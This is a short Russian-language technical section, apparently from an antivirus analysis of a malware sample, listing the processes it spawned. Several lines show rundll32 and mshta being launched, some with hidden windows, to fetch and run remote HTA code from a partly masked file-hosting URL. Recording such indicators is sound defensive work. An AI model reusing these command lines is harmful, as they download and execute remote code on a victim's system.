Техническая информация
- '<SYSTEM32>\rundll32.exe' SHELL32.DLL,ShellExec_RunDLL "mshta" "https://www.me###fire.com/file/4co4nhyjmnq8s2m/10.htm/file
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1464
- %TEMP%\1355570.cvr
- '<SYSTEM32>\rundll32.exe' SHELL32.DLL,ShellExec_RunDLL "mshta" "https://www.me###fire.com/file/4co4nhyjmnq8s2m/10.htm/file' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' "https://www.me###fire.com/file/4co4nhyjmnq8s2m/10.htm/file' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' "https://www.me###fire.com/file/4co4nhyjmnq8s2m/10.htm/file